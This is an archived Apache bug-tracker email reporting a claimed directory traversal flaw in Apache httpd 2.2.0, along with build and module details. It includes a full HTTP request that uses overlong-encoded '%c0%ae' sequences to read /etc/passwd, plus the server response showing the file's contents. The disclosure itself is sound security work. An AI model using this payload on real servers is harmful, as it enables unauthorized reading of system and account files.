httpd-bugs mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From bugzi...@apache.org
Subject DO NOT REPLY [Bug 45417] New: Directory Traversal Vulnerability
Date Thu, 17 Jul 2008 08:52:21 GMT
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417

           Summary: Directory Traversal Vulnerability
           Product: Apache httpd-2
           Version: 2.2.0
          Platform: Other
        OS/Version: Linux
            Status: NEW
          Severity: critical
          Priority: P1
         Component: All
        AssignedTo: bugs@httpd.apache.org
        ReportedBy: bar4mi@gmail.com
                CC: bar4mi@gmail.com


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear Bugzilla

I'm Simon Ryeo who is a computer security consultant in South Korea.
(My main job is penetration testing.)

I found a critical security problem on Apache 2.2.0. 
I'd like to find it's major reason but I don't have any time because of my
project.
Also, I couldn't test it on last version(2.2.9)

[Overview]
An attacker can get important files(/etc/passwd, etc.) of the system using
Apache 2.2.0.
He can do it just using '%c0%ae%c0%ae' which means 'dot-dot-slash'. 
It is just the encoded directory traversal attack.

[Exploit]
An attacker just does request the wanted files with '%c0%ae%c0%ae'.

GET
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0
%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0
Accept: */*
Accept-Language: ko-KR
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.target.com


HTTP/1.1 200 OK
Content-Length: 1411
Date: Mon, 14 Jul 2008 08:05:05 GMT
Server: Apache
Last-Modified: Sun, 06 Jul 2008 08:26:01 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: ko

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...


[Environments]
It was rebuild with published apache 2.2.0 by user. He used below
configurations and systems.

1. build options
./configure --prefix=/usr/local/httpd-2.2.0 --enable-proxy
- --enable-module=so --disable-auth --enable-include --disable-env
- --disable-autoindex --disable-cgi --disable-negotiation --disable-imap
- --disable-actions --disable-userdir --enable-dos --enable-rewrite 

2. Operation System: Redhat Enterprise
3. Apache Version: apache 2.2.0
4. Httpd modules list 
     core.c
     mod_auth_file.c
     mod_authn_default.c
     mod_authz_host.c
     mod_authz_groupfile.c
     mod_authz_user.c
     mod_authz_default.c
     mod_auth_basic.c
     mod_include.c
     mod_filter.c
     mod_log_config.c
     mod_setenvif.c
     mod_proxy.c
     mod_proxy_ftp.c
     mod_proxy_http.c
     mod_proxy_ajp.c
     mod_proxy_balancer.c
     prefork.c
     http_core.c
     mod_mime.c
     mod_status.c
     mod_asis.c
     mod_dir.c
     mod_alias.c
     mod_rewrite.c
     mod_so.c
6. Additional modules
     mod_jk.so (version 1.2.1.5)
     mod_evasive20.so (version 1.10.1)


[My additional contact information]
barami@ahnlab.com (Ahnlab, Inc.)
bar4mi@apache-kr.org (The Apache Korea Group)

-----BEGIN PGP SIGNATURE-----
Version: 9.8.3.4028

wj8DBQFIfwYCzuoR/xLtCioRAoCIAJ4ti9JR1sKFYzgcarbptRnpFYytJACgkT57
wqY9b4bRKkVwkEEQNlBZ1Cc=
=RQMK
-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 9.8.3.4028

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
Z9c=
=JQcw
-----END PGP PUBLIC KEY BLOCK-----


-- 
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org


Mime
View raw message